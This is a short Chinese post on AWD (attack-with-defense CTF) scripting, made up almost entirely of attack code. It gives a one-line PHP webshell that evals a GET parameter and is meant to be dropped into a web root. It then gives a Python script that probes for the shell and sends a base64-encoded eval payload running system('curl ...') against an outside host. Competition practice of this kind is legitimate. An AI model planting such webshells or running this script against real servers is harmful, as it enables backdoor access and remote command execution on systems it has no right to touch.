AWD脚本编写_1

AWD脚本编写_1

shell.php（放在网站根目录下）

<?php
error_reporting(0);
eval($_GET["yanxiao"]);
?>

脚本编写成功

后门文件利用与解析

import requests
import base64

def get_flag(url, flag_url, method, passwd, flag_path):
    cmd = "curl " + flag_url  # 修复命令拼写错误
    get_cmd = "echo system(\"%s\");" % cmd

    data = {}
    data[passwd] = "@eval(base64_decode($_POST['z0']));"
    data['z0'] = base64.b64encode(get_cmd.encode('utf-8')).decode('utf-8')  # 修复编码错误

    if method == "get":
        url = "http://" + url + "/" + flag_path  # 修复 URL 格式
        try:
            res = get_re(url)
        except Exception as e:
            print(f"{url} connection_timeout: {e}")
            return 0
        if res.status_code != 200:
            print(f"{url} webshell not found")
            return 0
        else:
            print(f"{url} webshell is found")

    elif method == "post":
        try:
            res = post_re(url, data)  # 传递 data 参数
            print(res.content)  # 打印响应内容
        except Exception as e:
            print(f"{url} connection_timeout: {e}")
            return 0
        if res.status_code != 200:
            print(f"{url} webshell not found")
            return 0
        else:
            print(f"{url} webshell is found")

def get_re(url):
    res = requests.get(url=url, timeout=5)
    return res

def post_re(url, data):  # 添加 data 参数
    res = requests.post(url=url, data=data, timeout=5)
    return res

url = "127.0.0.1"
flag_url = "http://192.168.45.1"
method = "get"
passwd = "yanxiao"
flag_path = "shell.php"

get_flag(url, flag_url, method, passwd, flag_path)

#http://127.0.0.1/shell.php webshell is found